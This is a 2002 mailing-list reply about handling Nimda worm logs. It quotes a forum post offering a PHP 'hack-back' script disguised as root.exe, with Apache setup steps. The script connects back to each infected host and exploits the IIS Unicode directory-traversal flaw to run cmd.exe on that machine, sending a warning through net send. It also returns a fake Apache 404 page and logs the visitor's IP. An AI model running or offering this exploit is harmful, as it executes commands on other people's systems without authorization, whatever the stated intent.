Vulnerability Development mailing list archives
Re: Publishing Nimda Logs
From: Jonathan Bloomquist <bocasolutions () yahoo com>
Date: Tue, 7 May 2002 12:36:09 -0700 (PDT)
--- "Deus, Attonbitus" <Thor () HammerofGod com> wrote: -- snip --
1) Recommended. Go for it and publish the IP's and let the "Gods of IP" sort out the damage. 2) A Bad Thing. These are innocent victims, and you will just have them be attacked by evil people. 3) Boring. Who cares? It's Nimda, and an everyday part of life. Deal with it and ignore the logs. If "1," then I was thinking of going with a "Hall of Shame" and providing ARIN look ups, contacts, and the whole bit. I could even allow other people to post logs there and stuff like that... Input appreciated.
How about another option (4. warn the infected) as proposed in this slashdot post (text follows): http://slashdot.org/comments.pl?sid=21830&cid=2329699 I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe" <?php /* Open a connection to the offender */ $fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5); /* Check to see if the connection actually opened */ if ($fp) { /* URL-encode the message... */ $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information."); /* ...and send it */ fputs ($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n"); /* close the connection (though it probably got closed automatically) */ fclose ($fp); } /* for fun and confusion.. */ header ("HTTP/1.0 404"); echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"); echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" ); echo ("<h1>Not Found</h1>\n"); echo ("The requested URL $SCRIPT_NAME was not found on this server.\n"); echo ("</body></html>\n"); echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n"); echo ("</body></html>\n"); $res = "dirty\r\n"; $log = fopen("/tmp/nimda.log", "a"); fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res); fclose($log); ?> Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right? Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this: AddType application/x-httpd-php .php .php3 .exe Now restart Apache by issuing one of either: /etc/rc.d/init.d/httpd restart apachectl restart That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimba.log. __________________________________________________ Do You Yahoo!? Yahoo! Health - your guide to health and wellness http://health.yahoo.com
Current thread:
- Re: Publishing Nimda Logs, (continued)
- Re: Publishing Nimda Logs Pavel Lozhkin (May 08)
- Re: Publishing Nimda Logs Bernie Cosell (May 07)
- RE: Publishing Nimda Logs Tech Support (May 07)
- Re: Publishing Nimda Logs Blue Boar (May 07)
- Re: Publishing Nimda Logs Bernie Cosell (May 07)
- Re: Publishing Nimda Logs Erik Fichtner (May 07)
- Re: Publishing Nimda Logs Ron DuFresne (May 07)
- Re: Publishing Nimda Logs Lincoln Yeoh (May 08)
- RE: Publishing Nimda Logs Andy Wood (May 08)
- Re: Publishing Nimda Logs Nick Lange (May 08)
- RE: Publishing Nimda Logs Andy Wood (May 08)